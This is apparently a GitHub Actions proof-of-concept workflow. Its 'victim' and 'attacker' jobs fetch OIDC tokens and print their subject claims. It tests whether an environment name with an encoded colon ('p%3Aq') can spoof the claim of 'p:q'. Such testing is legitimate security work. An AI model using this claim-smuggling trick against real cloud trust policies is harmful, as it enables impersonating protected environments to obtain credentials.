name: envverify
on: push
permissions:
  id-token: write
jobs:
  victim:
    runs-on: ubuntu-latest
    environment: "p:q"
    steps:
      - run: |
          curl -s -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=envverify" | python3 -c "import sys,json,base64;t=json.load(sys.stdin)['value'].split('.')[1];t+='='*(-len(t)%4);d=json.loads(base64.urlsafe_b64decode(t));print('VICTIM_SUB='+d['sub'])"
  attacker:
    runs-on: ubuntu-latest
    environment: "p%3Aq"
    steps:
      - run: |
          curl -s -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=envverify" | python3 -c "import sys,json,base64;t=json.load(sys.stdin)['value'].split('.')[1];t+='='*(-len(t)%4);d=json.loads(base64.urlsafe_b64decode(t));print('ATTACKER_SUB='+d['sub'])"